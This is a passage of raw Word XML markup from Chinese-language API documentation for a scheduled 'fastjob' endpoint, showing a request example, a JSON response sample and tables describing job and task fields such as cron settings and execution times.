          <w:p w14:paraId="5D451DE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="37EA6E5F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E73558F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A63274" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否定时执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50B16836" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3799115F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="063C41B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40F7C6F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C97F7E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>job?osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0DFF0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFEA775" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"row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c486167657c321a8c925f"</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testxxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</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cronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</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lastExecuteTime</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>lastExecuteTaskRecordId</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updatedTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 14:17:05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>createdTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 14:17:05"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>realmName</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agents"</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osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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DataTypeTok"/>
        </w:rPr>
        <w:t>"task"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"0478ee5024763edc6d3c"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>taskName</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riskInfo</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params"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Other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total"</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charts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B1895"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2568"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="3296"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6356CCE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79AE73F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA60A91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F03CBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76A70E70" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13FF2371" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DFF6D02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B05C018" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AB6B597" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01E1E7F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="528C72DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711EEEA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="188AD417" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E6146C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E55A32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DC20D72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5965F9A0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F72BA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45519EF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="674B937C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65178D08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38265973" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="324260F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378E31C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>定时表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5190FDD3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538A5687" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D266516" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4500FA59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AA5FD5F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42666B28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E29BFC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52AE7AB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3193E090" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CF5DEE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createdTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F75495E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="718C61E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48B3BA4A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111AB67A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D728B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01417F0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>上次作业执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19FCF52E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31FE74F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTaskRecordId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D8E824" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="614E7575" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最近一次执行的task的执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17CA8B5E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185699DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D5976F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C34FC93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速作业对应的任务详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50514148" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task结构说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1059"/>
        <w:gridCol w:w="1268"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4156872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8424078" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B02938" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0129F2DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0574C881" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8C1FCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DACB5EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55CBC5EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E9E5C6B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C3CA133" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
